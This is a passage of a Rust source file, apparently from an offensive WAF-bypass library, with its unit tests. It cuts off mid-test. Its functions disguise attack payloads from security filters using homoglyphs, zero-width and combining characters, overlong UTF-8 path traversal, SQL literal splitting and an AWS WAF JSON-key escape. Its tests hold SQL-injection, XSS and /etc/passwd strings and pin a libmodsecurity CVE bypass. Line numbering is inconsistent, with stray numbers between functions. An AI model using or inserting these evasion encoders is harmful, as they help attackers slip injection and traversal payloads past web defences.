/// * An *unterminated* literal (opening quote with no closing quote
///   before end of input) is copied through byte-for-byte, including any
///   `''` pairs it contains.
///
/// **Idempotent**: every emitted literal holds at most one character, so
/// a second pass reproduces its input.
#[must_use]
pub fn sql_adjacent_string_concat(payload: &str) -> String {
    let mut out = String::with_capacity(payload.len() + 8);
    let mut chars = payload.char_indices().peekable();
    while let Some((open_at, ch)) = chars.next() {
        if ch != '\'' {
            out.push(ch);
            continue;
        }

        // Decode the literal body: `''` collapses to a single `'`, a lone
        // `'` terminates the literal.
        let mut literal: Vec<char> = Vec::new();
        let mut closed = false;
        while let Some((_, next)) = chars.next() {
            if next != '\'' {
                literal.push(next);
            } else if chars.next_if(|&(_, c)| c == '\'').is_some() {
                literal.push('\'');
            } else {
                closed = true;
                break;
            }
        }

        if !closed {
            // The scan above ran to end of input. Copy the raw tail rather
            // than the decoded buffer, otherwise `''` pairs inside the
            // unterminated literal would be silently halved.
            out.push_str(&payload[open_at..]);
            break;
        }

        if literal.is_empty() {
            out.push_str("''");
            continue;
        }

        // One quoted token per character, joined by single spaces. A
        // one-character literal therefore round-trips unchanged.
        for (idx, c) in literal.into_iter().enumerate() {
            if idx > 0 {
                out.push(' ');
            }
            if c == '\'' {
                // Opening quote, escaped quote pair, closing quote.
                out.push_str("''''");
            } else {
                out.push('\'');
                out.push(c);
                out.push('\'');
            }
        }
    }
    out
}
903
/// Homoglyph substitution for punctuation — swaps a fixed set of ASCII
/// operators and delimiters for look-alike non-ASCII code points.
///
/// Replaced characters: `<`, `>`, `=`, `(`, `)`, `;` (fullwidth forms),
/// `-` (U+2010 HYPHEN) and `/` (U+2215 DIVISION SLASH). Everything else,
/// including letters, digits and both quote characters, is copied
/// unchanged.
///
/// **Bypass mechanism**: a rule that matches the ASCII bytes of these
/// characters does not match the substitutes. Whether the payload is
/// still interpreted afterwards depends on the backend normalising or
/// tolerating these code points — confirm per target.
#[must_use]
pub fn homoglyph_encode(payload: &str) -> String {
    let mut out = String::with_capacity(payload.len() * 4);
    out.extend(payload.chars().map(|ch| match ch {
        // `'` and `"` are deliberately absent from this table. Their
        // typographic look-alikes (U+2019, U+201D) are not string
        // delimiters to a SQL parser, so substituting them leaves the host
        // literal unclosed and the injection inert. Only non-delimiter
        // punctuation is rewritten.
        '<' => '\u{FF1C}', // FULLWIDTH LESS-THAN SIGN
        '>' => '\u{FF1E}', // FULLWIDTH GREATER-THAN SIGN
        '=' => '\u{FF1D}', // FULLWIDTH EQUALS SIGN
        '(' => '\u{FF08}', // FULLWIDTH LEFT PARENTHESIS
        ')' => '\u{FF09}', // FULLWIDTH RIGHT PARENTHESIS
        ';' => '\u{FF1B}', // FULLWIDTH SEMICOLON
        '-' => '\u{2010}', // HYPHEN
        '/' => '\u{2215}', // DIVISION SLASH
        untouched => untouched,
    }));
    out
}
949
/// Insert `invisible_char` after each ASCII alphanumeric character of
/// `payload`, except when that character is the last one in the string.
///
/// Non-alphanumeric characters (punctuation, whitespace, non-ASCII) are
/// copied through and never followed by an insertion. The result is
/// byte-distinct from the input; with a zero-width `invisible_char` it is
/// meant to look the same when rendered.
///
/// Example: with U+200B, `<script>` becomes
/// `<s\u{200B}c\u{200B}r\u{200B}i\u{200B}p\u{200B}t\u{200B}>`, so a
/// pattern looking for the contiguous bytes `script` no longer matches.
/// Whether the consumer strips the inserted character again is
/// target-specific.
///
/// A single character is used for the whole call. To vary the character,
/// call this function with different elements of [`ZERO_WIDTH_DEFAULTS`].
#[must_use]
pub fn zero_width_inject(payload: &str, invisible_char: char) -> String {
    let mut out = String::with_capacity(payload.len() * 2);
    for (offset, ch) in payload.char_indices() {
        out.push(ch);
        // A character has a successor exactly when it does not end at the
        // end of the string; the final character is left bare so trailing
        // context is preserved.
        let has_successor = offset + ch.len_utf8() < payload.len();
        if has_successor && ch.is_ascii_alphanumeric() {
            out.push(invisible_char);
        }
    }
    out
}
980
/// Recommended set of invisible characters for zero-width injection, in
/// order: U+200B ZERO WIDTH SPACE, U+200C ZERO WIDTH NON-JOINER,
/// U+200D ZERO WIDTH JOINER, U+FEFF ZERO WIDTH NO-BREAK SPACE (the
/// byte-order mark) and U+034F COMBINING GRAPHEME JOINER.
///
/// [`zero_width_inject`] takes one `char` per call, so cycling through
/// this array is left to the caller.
pub const ZERO_WIDTH_DEFAULTS: [char; 5] =
    ['\u{200B}', '\u{200C}', '\u{200D}', '\u{FEFF}', '\u{034F}'];
985
/// Append the combining character `mark` after every ASCII letter of
/// `payload`.
///
/// Digits, punctuation, whitespace and non-ASCII characters are copied
/// unchanged with nothing appended. With U+0308 COMBINING DIAERESIS,
/// `se1` becomes `s\u{0308}e\u{0308}1`: a byte pattern such as `/select/`
/// no longer matches the marked-up keyword.
///
/// Typical marks are U+0300 grave, U+0301 acute, U+0308 diaeresis,
/// U+0327 cedilla, or U+034F COMBINING GRAPHEME JOINER when no visible
/// diacritic is wanted. The caller always supplies the mark; whether the
/// backend strips or normalises it away again must be checked per target.
#[must_use]
pub fn combining_mark_inject(payload: &str, mark: char) -> String {
    payload.chars().fold(
        String::with_capacity(payload.len() * 3),
        |mut marked, ch| {
            marked.push(ch);
            if ch.is_ascii_alphabetic() {
                marked.push(mark);
            }
            marked
        },
    )
}
1008
/// Cross-script letter substitution — replaces selected ASCII letters
/// with look-alike Cyrillic or Greek letters.
///
/// Where [`homoglyph_encode`] rewrites punctuation only, this function
/// rewrites letters, so a keyword pattern sees different bytes. Letters
/// covered:
///
/// * lowercase `a c e o p s x y` → Cyrillic
/// * uppercase `A B C E H K M O P T X` → Cyrillic
/// * lowercase `n v` → Greek (eta, nu)
///
/// Every other character is copied unchanged. The substitutes are
/// distinct code points; the payload only remains meaningful when the
/// backend maps them back to ASCII (for example through a lossy
/// character-set or collation conversion) — confirm per target.
#[must_use]
pub fn script_homoglyph_encode(payload: &str) -> String {
    // Look-alike for a single character, or the character itself when the
    // table has no entry for it.
    fn lookalike(ch: char) -> char {
        match ch {
            // Cyrillic, lowercase.
            'a' => '\u{0430}', // CYRILLIC SMALL LETTER A
            'c' => '\u{0441}', // CYRILLIC SMALL LETTER ES
            'e' => '\u{0435}', // CYRILLIC SMALL LETTER IE
            'o' => '\u{043E}', // CYRILLIC SMALL LETTER O
            'p' => '\u{0440}', // CYRILLIC SMALL LETTER ER
            's' => '\u{0455}', // CYRILLIC SMALL LETTER DZE
            'x' => '\u{0445}', // CYRILLIC SMALL LETTER HA
            'y' => '\u{0443}', // CYRILLIC SMALL LETTER U
            // Cyrillic, uppercase.
            'A' => '\u{0410}', // CYRILLIC CAPITAL LETTER A
            'B' => '\u{0412}', // CYRILLIC CAPITAL LETTER VE
            'C' => '\u{0421}', // CYRILLIC CAPITAL LETTER ES
            'E' => '\u{0415}', // CYRILLIC CAPITAL LETTER IE
            'H' => '\u{041D}', // CYRILLIC CAPITAL LETTER EN
            'K' => '\u{041A}', // CYRILLIC CAPITAL LETTER KA
            'M' => '\u{041C}', // CYRILLIC CAPITAL LETTER EM
            'O' => '\u{041E}', // CYRILLIC CAPITAL LETTER O
            'P' => '\u{0420}', // CYRILLIC CAPITAL LETTER ER
            'T' => '\u{0422}', // CYRILLIC CAPITAL LETTER TE
            'X' => '\u{0425}', // CYRILLIC CAPITAL LETTER HA
            // Greek, for letters without a Cyrillic twin in this table.
            'n' => '\u{03B7}', // GREEK SMALL LETTER ETA
            'v' => '\u{03BD}', // GREEK SMALL LETTER NU
            other => other,
        }
    }

    let mut out = String::with_capacity(payload.len() * 2);
    out.extend(payload.chars().map(lookalike));
    out
}
1061
/// Turkish-i substitution: `i` becomes U+0131 (LATIN SMALL LETTER DOTLESS
/// I) and `I` becomes U+0130 (LATIN CAPITAL LETTER I WITH DOT ABOVE).
/// All other characters are copied unchanged.
///
/// Neither substitute is an ASCII letter, so a filter that folds case
/// byte-wise over ASCII and then looks for `script` does not match
/// `scr\u{0131}pt`. The payload only stays live if a later stage maps the
/// Turkish letters back to `i`/`I` (locale-aware case mapping or similar)
/// — confirm per target.
///
/// Background: the 2018 GitHub authentication bypass via Turkish
/// dotless-i belongs to this class of case-mapping mismatches.
#[must_use]
pub fn turkish_i_encode(payload: &str) -> String {
    let mut out = String::with_capacity(payload.len() * 2);
    for ch in payload.chars() {
        out.push(match ch {
            'i' => '\u{0131}',
            'I' => '\u{0130}',
            other => other,
        });
    }
    out
}
1083
/// Sharp-s substitution: both `s` and `S` become `ß` (U+00DF, LATIN SMALL
/// LETTER SHARP S). All other characters are copied unchanged.
///
/// The substitute is a different byte sequence from either ASCII letter,
/// so a pattern for `script` or `select` does not match. The payload is
/// only meaningful when the backend expands or folds `ß` back towards
/// `s`/`ss` (for example via full Unicode case folding) — a narrower
/// precondition than for [`turkish_i_encode`]; confirm per target.
#[must_use]
pub fn sharp_s_encode(payload: &str) -> String {
    let mut out = String::with_capacity(payload.len() * 2);
    for ch in payload.chars() {
        if matches!(ch, 's' | 'S') {
            out.push('\u{00DF}');
        } else {
            out.push(ch);
        }
    }
    out
}
1102
1103/// AWS WAF JSON-pointer escape — encode every char of `key` as
1104/// `\uXXXX` so the WAF's JSON-pointer rule (e.g. `/id` literal-match)
1105/// misses, while the backend JSON parser decodes the escape and
1106/// routes the value to the original field.
1107///
1108/// Returns the JSON fragment `{"<key-escaped>": "<value>"}` ready to
1109/// drop into a request body. Sicuranext 2024 confirmed bypass.
1110#[must_use]
1111pub fn json_key_unicode_escape(key: &str, value: &str) -> String {
1112    let mut escaped_key = String::with_capacity(key.len() * 6);
1113    for ch in key.chars() {
1114        let cp = ch as u32;
1115        if cp <= 0xFFFF {
1116            escaped_key.push_str(&format!("\\u{:04x}", cp));
1117        } else {
1118            // Surrogate pair for non-BMP codepoints.
1119            let v = cp - 0x10000;
1120            let hi = 0xD800 + (v >> 10);
1121            let lo = 0xDC00 + (v & 0x3FF);
1122            escaped_key.push_str(&format!("\\u{:04x}\\u{:04x}", hi, lo));
1123        }
1124    }
1125    // Value goes through JSON-safe encode (the existing helper).
1126    let value_json = serde_json::to_string(value).unwrap_or_else(|_| format!("\"{value}\""));
1127    format!("{{\"{escaped_key}\": {value_json}}}")
1128}
1129
/// Overlong UTF-8 encoding of `.`, `/` and `\` for path traversal.
///
/// Each of the three characters is replaced by a percent-encoded
/// *overlong* UTF-8 sequence, i.e. a multi-byte form of a code point
/// that fits in one byte (`../` → `%c0%ae%c0%ae%c0%af` at width 2). All
/// other characters are copied unchanged. Strict UTF-8 decoders reject
/// overlong forms; the technique targets permissive decoders sitting
/// behind a filter that does not recognise them.
///
/// `width` selects the sequence length: `2` or `3` bytes; **any other
/// value selects the 4-byte form**.
///
/// | char | 2-byte   | 3-byte      | 4-byte         |
/// |------|----------|-------------|----------------|
/// | `.`  | `%c0%ae` | `%e0%80%ae` | `%f0%80%80%ae` |
/// | `/`  | `%c0%af` | `%e0%80%af` | `%f0%80%80%af` |
/// | `\`  | `%c1%9c` | `%e0%81%9c` | `%f0%80%81%9c` |
#[must_use]
pub fn overlong_utf8_path(path: &str, width: u8) -> String {
    // Every byte after the lead must be a continuation byte (`10xxxxxx`).
    // `\` is 0x5C = 0b1_011100, so its low six bits give 0x9C and the
    // remaining bit lands in the preceding byte (0xC1 / 0x81). A trailing
    // `%5c` would be a plain encoded backslash, not an overlong form.
    let (dot, slash, backslash) = match width {
        2 => ("%c0%ae", "%c0%af", "%c1%9c"),
        3 => ("%e0%80%ae", "%e0%80%af", "%e0%81%9c"),
        _ => ("%f0%80%80%ae", "%f0%80%80%af", "%f0%80%81%9c"),
    };
    // All three replacements have the same length at a given width, so this
    // is an upper bound on the output size.
    let mut out = String::with_capacity(path.len() * slash.len());
    for c in path.chars() {
        match c {
            '.' => out.push_str(dot),
            '/' => out.push_str(slash),
            '\\' => out.push_str(backslash),
            other => out.push(other),
        }
    }
    out
}
1174
/// Bidi override wrapper — returns `reversed_keyword` enclosed between
/// U+202E (RIGHT-TO-LEFT OVERRIDE) and U+202C (POP DIRECTIONAL
/// FORMATTING).
///
/// The argument is inserted as given; the caller supplies the keyword
/// already reversed (e.g. `tceleS`). A scanner reading bytes in order
/// sees the reversed text, while a bidi-aware viewer displays it in the
/// opposite direction (`Select`). This is the CVE-2021-42574
/// ("Trojan Source") class of trick.
///
/// **Narrow direct bypass surface** — mainly useful for confusing logs
/// and rule-auditing tools. It only yields an executable payload when
/// some stage strips the bidi controls before forwarding.
#[must_use]
pub fn bidi_inject(reversed_keyword: &str) -> String {
    const RIGHT_TO_LEFT_OVERRIDE: char = '\u{202E}';
    const POP_DIRECTIONAL_FORMATTING: char = '\u{202C}';

    let mut wrapped = String::with_capacity(
        RIGHT_TO_LEFT_OVERRIDE.len_utf8()
            + reversed_keyword.len()
            + POP_DIRECTIONAL_FORMATTING.len_utf8(),
    );
    wrapped.push(RIGHT_TO_LEFT_OVERRIDE);
    wrapped.push_str(reversed_keyword);
    wrapped.push(POP_DIRECTIONAL_FORMATTING);
    wrapped
}
1190
1191#[cfg(test)]
1192mod tests {
1193    use super::*;
1194
1195    #[test]
1196    fn unicode_encode_basic() {
1197        assert_eq!(unicode_encode("A"), "\\u0041");
1198        assert_eq!(unicode_encode("AB"), "\\u0041\\u0042");
1199    }
1200
1201    #[test]
1202    fn json_unicode_alnum_keyword_split() {
1203        // "UNION" becomes 5 `\uXXXX` sequences, ASCII bytes nowhere.
1204        let out = json_unicode_alnum("UNION");
1205        assert_eq!(out, "\\u0055\\u004E\\u0049\\u004F\\u004E");
1206        assert!(!out.contains("UNION"));
1207    }
1208
1209    // ── json_unicode_full / mixed_case tests ──────────────────────────
1210
1211    #[test]
1212    fn json_unicode_full_escapes_every_char() {
1213        let out = json_unicode_full("a' b");
1214        // Every char including space and quote escaped.
1215        assert!(out.contains("\\u0061")); // a
1216        assert!(out.contains("\\u0027")); // '
1217        assert!(out.contains("\\u0020")); // space
1218        assert!(out.contains("\\u0062")); // b
1219        // No literal input char remains as plain (input letters 'a' and 'b'
1220        // appear only inside hex of escapes; the literal 'a' standalone
1221        // boundary should NOT be present as a runnable token).
1222        // Simpler check: every output codepoint is either backslash, 'u',
1223        // or hex digit.
1224        for c in out.chars() {
1225            assert!(
1226                c == '\\' || c == 'u' || c.is_ascii_hexdigit(),
1227                "unexpected raw char {c:?} in {out}"
1228            );
1229        }
1230    }
1231
1232    #[test]
1233    fn json_unicode_full_idempotent_on_pre_escaped() {
1234        let already = "\\u0073elect";
1235        let out = json_unicode_full(already);
1236        // Pre-existing s stays unchanged; "elect" gets escaped.
1237        assert!(out.starts_with("\\u0073"));
1238        assert!(out.contains("\\u0065")); // e
1239    }
1240
1241    #[test]
1242    fn json_unicode_full_handles_non_bmp_via_surrogate_pair() {
1243        // U+1F600 GRINNING FACE → 😀
1244        let out = json_unicode_full("😀");
1245        assert_eq!(out, "\\uD83D\\uDE00");
1246    }
1247
1248    #[test]
1249    fn json_unicode_mixed_case_alternates_forms() {
1250        let out = json_unicode_mixed_case("abcd");
1251        // 4 chars → 4 different forms.
1252        assert!(out.contains("\\u0061")); // i=0 lowercase
1253        assert!(out.contains("\\U0062")); // i=1 uppercase U
1254        assert!(out.contains("\\u0063")); // i=2 lower u, upper hex
1255        assert!(out.contains("\\U0064")); // i=3 upper U, lower hex
1256    }
1257
1258    #[test]
1259    fn json_unicode_alnum_leaves_punctuation() {
1260        // SQLi shape: keywords escaped, structural delimiters bare.
1261        let out = json_unicode_alnum("' OR 1=1--");
1262        assert_eq!(out, "' \\u004F\\u0052 \\u0031=\\u0031--");
1263        let out2 = json_unicode_alnum("AB CD");
1264        assert_eq!(out2, "\\u0041\\u0042 \\u0043\\u0044");
1265    }
1266
1267    #[test]
1268    fn json_unicode_alnum_idempotent_skip_pass() {
1269        // Second pass MUST be a no-op — already-escaped \uXXXX
1270        // sequences are detected and passed through.
1271        let once = json_unicode_alnum("UNION SELECT");
1272        let twice = json_unicode_alnum(&once);
1273        assert_eq!(once, twice, "tamper must stabilize");
1274    }
1275
1276    #[test]
1277    fn json_unicode_alnum_preserves_quote_unencoded() {
1278        // ' is U+0027 — NOT alphanumeric, so must stay literal.
1279        let out = json_unicode_alnum("'");
1280        assert_eq!(out, "'");
1281    }
1282
1283    #[test]
1284    fn json_unicode_alnum_xss_keyword_split() {
1285        // <script>alert — `<`, `>`, `(`, `)` stay bare; letters/digits escape.
1286        let out = json_unicode_alnum("<script>alert(1)</script>");
1287        assert!(!out.contains("script"));
1288        assert!(!out.contains("alert"));
1289        assert!(out.contains('<'));
1290        assert!(out.contains('>'));
1291        assert!(out.contains('('));
1292    }
1293
1294    #[test]
1295    fn json_unicode_alnum_empty_input() {
1296        assert_eq!(json_unicode_alnum(""), "");
1297    }
1298
1299    #[test]
1300    fn sql_adjacent_string_concat_basic() {
1301        // 'admin' (len 5) → 5 single-char adjacent literals.
1302        assert_eq!(sql_adjacent_string_concat("'admin'"), "'a' 'd' 'm' 'i' 'n'");
1303    }
1304
1305    #[test]
1306    fn sql_adjacent_string_concat_short_literal_unchanged() {
1307        // Length-1 literals must pass through (already minimum).
1308        assert_eq!(sql_adjacent_string_concat("'a'"), "'a'");
1309        assert_eq!(sql_adjacent_string_concat("''"), "''");
1310    }
1311
1312    #[test]
1313    fn sql_adjacent_string_concat_idempotent() {
1314        // Well-formed (balanced quotes) payload — the literals 'admin'
1315        // and 'root' each shatter into single-char adjacent literals.
1316        let once = sql_adjacent_string_concat("WHERE x='admin' OR y='root'");
1317        let twice = sql_adjacent_string_concat(&once);
1318        assert_eq!(once, twice, "tamper must stabilize on second pass");
1319        assert!(once.contains("'a' 'd' 'm' 'i' 'n'"));
1320        assert!(once.contains("'r' 'o' 'o' 't'"));
1321    }
1322
1323    #[test]
1324    fn sql_adjacent_string_concat_preserves_outside_literal() {
1325        // No quoted literal in payload — must be a no-op.
1326        assert_eq!(sql_adjacent_string_concat("1 OR 1=1--"), "1 OR 1=1--");
1327    }
1328
1329    #[test]
1330    fn sql_adjacent_string_concat_handles_escaped_quote() {
1331        // SQL '' escape inside a literal: the position holding `'` is
1332        // emitted as the four-quote form `''''` — opening, escaped pair,
1333        // closing — which parses as a length-1 literal containing `'`.
1334        // The database reassembles "O" + "'" + "B" + "r" + "i" + "e" + "n".
1335        let out = sql_adjacent_string_concat("'O''Brien'");
1336        assert_eq!(out, "'O' '''' 'B' 'r' 'i' 'e' 'n'");
1337    }
1338
1339    #[test]
1340    fn sql_adjacent_string_concat_escaped_quote_idempotent() {
1341        // Second pass: the `''''` token is a length-1 literal containing
1342        // `'` (below split threshold). It must pass through unchanged
1343        // (via the length-1 branch with the escaped-quote sub-case).
1344        let once = sql_adjacent_string_concat("'O''Brien'");
1345        let twice = sql_adjacent_string_concat(&once);
1346        assert_eq!(once, twice);
1347    }
1348
1349    #[test]
1350    fn sql_adjacent_string_concat_single_quote_literal_emits_four_quotes() {
1351        // A literal of length 1 containing only `'` (source: `''''`)
1352        // must output the same `''''` (passthrough form).
1353        let out = sql_adjacent_string_concat("''''");
1354        assert_eq!(out, "''''");
1355    }
1356
1357    #[test]
1358    fn sql_adjacent_string_concat_its_a_test_shatters_correctly() {
1359        // The dogfood agent's B5 reproducer.
1360        let out = sql_adjacent_string_concat("'it''s a test'");
1361        // Literal content: "it's a test" (11 chars). Each char emits
1362        // its own single-char literal; the `'` becomes `''''`.
1363        assert_eq!(out, "'i' 't' '''' 's' ' ' 'a' ' ' 't' 'e' 's' 't'");
1364    }
1365
1366    #[test]
1367    fn sql_adjacent_string_concat_unterminated_quote_passthrough() {
1368        // Defensive: an unclosed quote must not crash and must not
1369        // wrap-then-mistakenly-close. Output should preserve the bytes
1370        // verbatim except for the unmatched-quote tail.
1371        let out = sql_adjacent_string_concat("'unclosed");
1372        assert_eq!(out, "'unclosed");
1373    }
1374
1375    #[test]
1376    fn sql_adjacent_string_concat_path_literal_split() {
1377        // /etc/passwd path literal is a high-fidelity LFI fingerprint.
1378        // 11 chars → 11 single-char literals; the byte sequence
1379        // `/etc/passwd` no longer appears contiguously.
1380        let out = sql_adjacent_string_concat("'/etc/passwd'");
1381        assert_eq!(out, "'/' 'e' 't' 'c' '/' 'p' 'a' 's' 's' 'w' 'd'");
1382        assert!(!out.contains("/etc/passwd"));
1383    }
1384
1385    #[test]
1386    fn json_unicode_alnum_unicode_input_passes_through() {
1387        // Non-ASCII chars (日本語) are NOT ascii_alphanumeric — left bare.
1388        // This keeps the function focused on the keyword-bypass mission.
1389        let out = json_unicode_alnum("日本");
1390        assert_eq!(out, "日本");
1391    }
1392
1393    #[test]
1394    fn unicode_encode_special_chars() {
1395        let encoded = unicode_encode("' OR 1=1--");
1396        assert!(encoded.contains("\\u0027")); // '
1397        assert!(encoded.contains("\\u003D")); // =
1398    }
1399
1400    #[test]
1401    fn unicode_encode_unicode() {
1402        let encoded = unicode_encode("日本語");
1403        assert_eq!(encoded, "\\u65E5\\u672C\\u8A9E");
1404    }
1405
1406    #[test]
1407    fn iis_unicode_encode_basic() {
1408        assert_eq!(iis_unicode_encode("A"), "%u0041");
1409        assert_eq!(iis_unicode_encode("AB"), "%u0041%u0042");
1410    }
1411
1412    #[test]
1413    fn iis_unicode_encode_bmp_only_for_3byte_utf8() {
1414        // U+65E5 (日) is BMP — emits as a single %uXXXX, no
1415        // surrogate. This is the existing happy path.
1416        assert_eq!(iis_unicode_encode("日"), "%u65E5");
1417    }
1418
1419    #[test]
1420    fn iis_unicode_encode_non_bmp_emits_surrogate_pair() {
1421        // U+1F600 (😀) is supplementary plane. Pre-fix this emitted
1422        // `%u1F600` (5 hex digits — invalid IIS %u, silently
1423        // unencodable, bypass-rate killer). Post-fix it MUST emit a
1424        // UTF-16 surrogate pair `%uD83D%uDE00`.
1425        assert_eq!(iis_unicode_encode("😀"), "%uD83D%uDE00");
1426    }
1427
1428    #[test]
1429    fn iis_unicode_encode_mixed_bmp_and_non_bmp() {
1430        // Adversarial: a mix of plain ASCII + BMP + supplementary
1431        // must produce exactly one %uXXXX or %uXXXX%uXXXX per char.
1432        // No 5-digit %u sequences anywhere — pin the regression.
1433        let out = iis_unicode_encode("A日😀");
1434        assert_eq!(out, "%u0041%u65E5%uD83D%uDE00");
1435        // Anti-regression: scan for any 5-hex-digit %u sequence.
1436        // The fix would silently regress if someone widened the
1437        // format string to %u{:05X} thinking it "supports" non-BMP.
1438        for hex_run in out.split("%u").skip(1) {
1439            let hex_part: String = hex_run
1440                .chars()
1441                .take_while(|c| c.is_ascii_hexdigit())
1442                .collect();
1443            assert!(
1444                hex_part.len() == 4,
1445                "every %u sequence must be exactly 4 hex digits (IIS spec); \
1446                 got {hex_part:?} in output {out:?}"
1447            );
1448        }
1449    }
1450
1451    #[test]
1452    fn json_encode_basic() {
1453        // F67: encoder produces escaped CONTENT only (no
1454        // surrounding double-quotes). Callers inject into an
1455        // existing JSON string field; wrapping our own quotes
1456        // would break the host JSON document.
1457        assert_eq!(json_string_encode("A"), "A");
1458        assert_eq!(json_string_encode("A\\B"), "A\\\\B");
1459        assert_eq!(json_string_encode("A\"B"), "A\\\"B");
1460        assert_eq!(json_string_encode("A\nB"), "A\\nB");
1461    }
1462
1463    #[test]
1464    fn json_encode_control_chars() {
1465        assert_eq!(json_string_encode("\x01"), "\\u0001");
1466    }
1467
1468    #[test]
1469    fn html_entity_encode_basic() {
1470        assert_eq!(html_entity_encode("A"), "&#x41;");
1471        assert_eq!(html_entity_encode("AB"), "&#x41;&#x42;");
1472    }
1473
1474    #[test]
1475    fn html_entity_encode_special_chars() {
1476        let encoded = html_entity_encode("<script>");
1477        assert_eq!(encoded, "&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;");
1478    }
1479
1480    #[test]
1481    fn html_entity_decimal_encode_basic() {
1482        assert_eq!(html_entity_decimal_encode("A"), "&#65;");
1483        assert_eq!(html_entity_decimal_encode("<"), "&#60;");
1484    }
1485
1486    #[test]
1487    fn html_entity_encode_empty() {
1488        assert_eq!(html_entity_encode(""), "");
1489    }
1490
1491    // ── html_entity_zero_pad tests (CVE-2025-27110) ────────────────────
1492
1493    #[test]
1494    fn html_entity_zero_pad_hex_width_4_matches_cve_advisory_example() {
1495        // Pinned to the exact form the CVE-2025-27110 advisory uses
1496        // as its smoking gun: `&#x003C;` for `<`. If this drifts
1497        // (someone "tidies" the formatter), every libmodsecurity
1498        // 3.0.13 bypass stops working.
1499        assert_eq!(html_entity_zero_pad("<", 4, true), "&#x003C;");
1500    }
1501
1502    #[test]
1503    fn html_entity_zero_pad_decimal_width_4_matches_cve_advisory_example() {
1504        // The decimal counterpart from the same advisory: `&#0060;`
1505        // for `<`. Same bypass mechanism, different radix.
1506        assert_eq!(html_entity_zero_pad("<", 4, false), "&#0060;");
1507    }
1508
1509    #[test]
1510    fn html_entity_zero_pad_width_1_is_unpadded() {
1511        // width=1 means "pad to at least 1" which for any code point
1512        // > 0 is a no-op. Anti-rig: the function must not insert
1513        // leading zeros at width=1, otherwise it becomes equivalent
1514        // to width=2 and the "no-padding" form is unreachable.
1515        assert_eq!(html_entity_zero_pad("A", 1, true), "&#x41;");
1516        assert_eq!(html_entity_zero_pad("A", 1, false), "&#65;");
1517    }
1518
1519    #[test]
1520    fn html_entity_zero_pad_width_0_is_coerced_to_1() {
1521        // Boundary: pad=0 is a contract-violating input. We coerce
1522        // to 1 (the "no-padding" form) rather than emit `&#x;` (a
1523        // malformed entity). Catches a future refactor that uses
1524        // `pad.min(16)` only and forgets the `.max(1)` lower bound.
1525        assert_eq!(html_entity_zero_pad("A", 0, true), "&#x41;");
1526    }
1527
1528    #[test]
1529    fn html_entity_zero_pad_width_above_cap_is_clamped() {
1530        // Boundary: pad=100 is an anti-DoS concern. We clamp at 16.
1531        // The result for 'A' (0x41 = 2 hex digits) padded to 16 is
1532        // `&#x0000000000000041;` — 14 leading zeros. Pin the exact
1533        // byte sequence so a future change to the cap is visible
1534        // (and intentional).
1535        assert_eq!(html_entity_zero_pad("A", 100, true), "&#x0000000000000041;");
1536    }
1537
1538    #[test]
1539    fn html_entity_zero_pad_empty_input_produces_empty_output() {
1540        // Anti-rig: empty input must produce empty output (the
1541        // identity element of concatenation). A naive `for ch in
1542        // ""` does the right thing today; this test pins that the
1543        // result is exactly "" rather than e.g. "&#x;" from a
1544        // single dangling write.
1545        assert_eq!(html_entity_zero_pad("", 4, true), "");
1546        assert_eq!(html_entity_zero_pad("", 4, false), "");
1547    }
1548
1549    #[test]
1550    fn html_entity_zero_pad_xss_payload_round_trip_browser_equivalent() {
1551        // CVE-2025-27110 exploit-path smoke: a `<script>` payload
1552        // routed through width-4 hex must produce the exact byte
1553        // sequence that the CVE write-up shows as bypassing
1554        // libmodsecurity 3.0.13. If this changes, we're not
1555        // shipping the documented bypass anymore.
1556        let out = html_entity_zero_pad("<script>", 4, true);
1557        assert_eq!(
1558            out,
1559            "&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;"
1560        );
1561    }
1562
1563    // ── html_entity_variants tests ─────────────────────────────────────
1564
1565    #[test]
1566    fn html_entity_variants_cycles_four_forms() {
1567        // 'A'=0x41=65 — verify each of the four rotation slots
1568        let encoded = html_entity_variants("AAAA");
1569        assert_eq!(encoded, "&#x41;&#X41;&#65;&#00065;");
1570    }
1571
1572    #[test]
1573    fn html_entity_variants_continues_rotation() {
1574        // 'A'=65 — fifth char returns to slot 0 (lowercase-x hex)
1575        let encoded = html_entity_variants("AAAAA");
1576        assert_eq!(encoded, "&#x41;&#X41;&#65;&#00065;&#x41;");
1577    }
1578
1579    #[test]
1580    fn html_entity_variants_empty() {
1581        assert_eq!(html_entity_variants(""), "");
1582    }
1583
1584    #[test]
1585    fn html_entity_variants_xss_payload() {
1586        // '<' = 0x3C = 60, 's'=0x73=115, '>'=0x3E=62
1587        // First three chars use slots 0, 1, 2:
1588        let encoded = html_entity_variants("<s>");
1589        assert_eq!(encoded, "&#x3c;&#X73;&#62;");
1590    }
1591
1592    #[test]
1593    fn html_entity_variants_unicode_codepoint() {
1594        // emoji U+1F600 ('😀') — codepoint 128512 — exercises higher-bit chars
1595        let encoded = html_entity_variants("\u{1F600}");
1596        assert_eq!(encoded, "&#x1f600;");
1597    }
1598
1599    #[test]
1600    fn html_entity_variants_distinct_from_canonical() {
1601        // 4+ char payload MUST differ from canonical html_entity_encode
1602        // (canonical is always lowercase-x hex with semicolon)
1603        let canon = html_entity_encode("ABCD");
1604        let var = html_entity_variants("ABCD");
1605        assert_ne!(canon, var);
1606    }
1607
1608    #[test]
1609    fn html_entity_variants_deterministic() {
1610        // Same input → same output (no randomness; rotation is by index)
1611        assert_eq!(
1612            html_entity_variants("hello world"),
1613            html_entity_variants("hello world")
1614        );
1615    }
1616
1617    // ── math_bold_encode tests ─────────────────────────────────────────
1618
1619    #[test]
1620    fn math_bold_encode_uppercase() {
1621        assert_eq!(math_bold_encode("A"), "\u{1D400}"); // 𝐀
1622        assert_eq!(math_bold_encode("Z"), "\u{1D419}"); // 𝐙
1623    }
1624
1625    #[test]
1626    fn math_bold_encode_lowercase() {
1627        assert_eq!(math_bold_encode("a"), "\u{1D41A}"); // 𝐚
1628        assert_eq!(math_bold_encode("z"), "\u{1D433}"); // 𝐳
1629    }
1630
1631    #[test]
1632    fn math_bold_encode_digits() {
1633        assert_eq!(math_bold_encode("0"), "\u{1D7CE}"); // 𝟎
1634        assert_eq!(math_bold_encode("9"), "\u{1D7D7}"); // 𝟗
1635    }
1636
1637    #[test]
1638    fn math_bold_encode_sql_keyword() {
1639        // SELECT → 𝐒𝐄𝐋𝐄𝐂𝐓
1640        let encoded = math_bold_encode("SELECT");
1641        assert_eq!(encoded.chars().count(), 6);
1642        for ch in encoded.chars() {
1643            assert!(
